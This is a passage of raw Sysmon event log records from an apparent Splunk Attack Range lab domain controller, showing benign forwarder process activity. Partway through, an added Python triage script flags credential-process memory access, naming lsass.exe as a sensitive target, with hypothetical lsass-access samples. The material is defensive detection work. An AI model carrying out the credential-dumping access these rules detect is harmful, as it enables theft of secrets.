Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.772{4DB9351A-A231-60D3-9A04-00000000CF01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000021758Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.862{4DB9351A-A233-60D3-9C04-00000000CF01}56246828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021757Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.862{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ED0CD73AC1400949D07634FA5AE07F1,SHA256=4DE10C640E3578952E80676996702D75343C0B711A4F7D1CC54E13A76650E5DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021756Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.518{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A233-60D3-9C04-00000000CF01}5624C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021755Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.518{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021754Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:55.518{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021753Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.518{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021752Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:55.518{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021751Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.518{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A233-60D3-9C04-00000000CF01}5624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021750Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.518{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A233-60D3-9C04-00000000CF01}5624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021749Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.519{4DB9351A-A233-60D3-9C04-00000000CF01}5624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000021768Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.978{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A234-60D3-9D04-00000000CF01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021767Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:56.978{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021766Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.978{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021765Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:56.978{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021764Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.978{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021763Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.978{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A234-60D3-9D04-00000000CF01}4120C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021762Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.978{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A234-60D3-9D04-00000000CF01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021761Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.981{4DB9351A-A234-60D3-9D04-00000000CF01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021760Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.869{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=663A36DA8C92330848FDD3B44A393566,SHA256=A67F74B05BBBF5CB075134FC363482DB45C3324FBB07AE80D45C65E13E115831,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021759Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.549{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9ED663EB92301817DF33C48653061A8,SHA256=48BB60A61028624FA5620702C29B1F4E7243FD2CE14DFF5DACE80462BCAF1026,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021778Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.894{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98234AFF4D3ABFB9F5DAA410E97087A2,SHA256=F0342DC4F81939B5E3BD16EC3A2062640252DABC010BE15E2AB65BBACB61191F,IMPHASH=00000000000000000000000000000000falsetrue 
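The Event ID 10 (ProcessAccess) records above show the pattern that dominates this log: csrss.exe (through basesrv.DLL) and the parent splunkd.exe open every freshly started forwarder helper with GrantedAccess 0x1fffff (PROCESS_ALL_ACCESS), svchost.exe via lsm.dll opens sysmon64.exe with 0x1400, and the helpers open splunkd.exe with 0x101400. What separates this noise from a real handle to a credential process is the access mask and the CallTrace. The following Python is an added example, not code from the page, from Splunk or from Sysmon: it decodes the mask, flags call-stack frames whose backing module is neither under C:\Windows nor in the opener's own directory (Sysmon writes frames with no backing image as UNKNOWN(<address>)), and applies a baseline derived from the events on this page. The four PAGE_RECORDS are trimmed transcriptions of events visible above (GUIDs, PIDs and most frames dropped); the two CONSTRUCTED_RECORDS, including the updater.exe and dbg.exe paths, are hypothetical and do not appear on the page.

```python
"""Triage of Sysmon Event ID 10 (ProcessAccess) records. Added example; not page, Splunk or Sysmon code."""
import ntpath

# Process access rights from winnt.h; PROCESS_ALL_ACCESS is 0x1FFFFF on Vista and later.
ACCESS_BITS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL", 0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER", 0x00100000: "SYNCHRONIZE",
}
INJECT_MASK = 0x0002 | 0x0008 | 0x0010 | 0x0020 | 0x0040   # rights that touch memory or threads
MEMORY_READ_WRITE = 0x0010 | 0x0020
SENSITIVE_TARGETS = {"lsass.exe", "winlogon.exe", "services.exe"}


def decode_access(mask: int) -> list[str]:
    """Names of the rights set in a GrantedAccess mask; unnamed bits are reported as hex."""
    names = [name for bit, name in sorted(ACCESS_BITS.items()) if mask & bit]
    rest = mask & ~sum(ACCESS_BITS)
    return names + ([f"unnamed:0x{rest:x}"] if rest else [])


def frame_modules(calltrace: str) -> list[str]:
    """Split a Sysmon CallTrace ('module+offset|module+offset|...') into module paths."""
    return [f.rsplit("+", 1)[0] for f in calltrace.split("|") if f]


def unbacked_frames(calltrace: str, source_image: str) -> list[str]:
    """Frames not backed by a module under C:\\Windows or in the opener's own directory."""
    src_dir = ntpath.dirname(source_image).lower()
    return [m for m in frame_modules(calltrace)
            if not (m.lower().startswith("c:\\windows\\") or ntpath.dirname(m.lower()) == src_dir)]


def _allowed_pair(src: str, dst: str, frames: list[str]) -> bool:
    """Baseline taken from this page: csrss registering a new process, splunkd opening its own helpers."""
    mods = [ntpath.basename(f).lower() for f in frames]
    if ntpath.basename(src).lower() == "csrss.exe" and "basesrv.dll" in mods:
        return True
    return ntpath.basename(src).lower() == "splunkd.exe" and \
        ntpath.dirname(src).lower() == ntpath.dirname(dst).lower()


def triage(rec: dict) -> str:
    mask = int(rec["GrantedAccess"], 16)
    src, dst, trace = rec["SourceImage"], rec["TargetImage"], rec["CallTrace"]
    if not mask & INJECT_MASK:
        return "info"        # query/synchronize only, e.g. 0x1400 or 0x101400 on this page
    if ntpath.basename(dst).lower() in SENSITIVE_TARGETS and mask & MEMORY_READ_WRITE:
        return "alert"       # memory access to a credential or session process
    if unbacked_frames(trace, src):
        return "alert"       # call stack passes through unbacked or foreign code
    if _allowed_pair(src, dst, frame_modules(trace)):
        return "benign"
    return "review"


def triage_all(records: list[dict]) -> list[str]:
    return [triage(r) for r in records]


PAGE_RECORDS = [  # trimmed from events on the page
    {"SourceImage": r"C:\Windows\system32\svchost.exe", "TargetImage": r"C:\Windows\sysmon64.exe",
     "GrantedAccess": "0x1400", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593"},
    {"SourceImage": r"C:\Windows\system32\csrss.exe", "TargetImage": r"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe",
     "GrantedAccess": "0x1fffff", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f"},
    {"SourceImage": r"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe", "TargetImage": r"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe",
     "GrantedAccess": "0x1fffff", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Windows\System32\ucrtbase.dll+1fb80"},
    {"SourceImage": r"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe", "TargetImage": r"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe",
     "GrantedAccess": "0x101400", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5"},
]
CONSTRUCTED_RECORDS = [  # hypothetical negatives, not on the page
    {"SourceImage": r"C:\Users\Public\updater.exe", "TargetImage": r"C:\Windows\system32\lsass.exe",
     "GrantedAccess": "0x1010", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+a6134|UNKNOWN(00007FFD2A1B0C40)"},
    {"SourceImage": r"C:\Tools\dbg.exe", "TargetImage": r"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe",
     "GrantedAccess": "0x1fffff", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Tools\dbg.exe+1f20"},
]

if __name__ == "__main__":
    for rec in PAGE_RECORDS + CONSTRUCTED_RECORDS:
        print(triage(rec), rec["GrantedAccess"], decode_access(int(rec["GrantedAccess"], 16)))
```

Run as a script to print a verdict per record. The baseline is specific to this host: the csrss.exe and splunkd.exe pairs account for most of the Event 10 volume here and are the obvious candidates for a Sysmon configuration exclusion, while the 0x1400 and 0x101400 opens carry no memory rights at all. "review" is a triage bucket rather than a detection; a legitimate third-party DLL outside C:\Windows would land a record there too, so it is the queue to inspect, not the alert.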
10341000x800000000000000021777Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.863{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A235-60D3-9E04-00000000CF01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021776Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 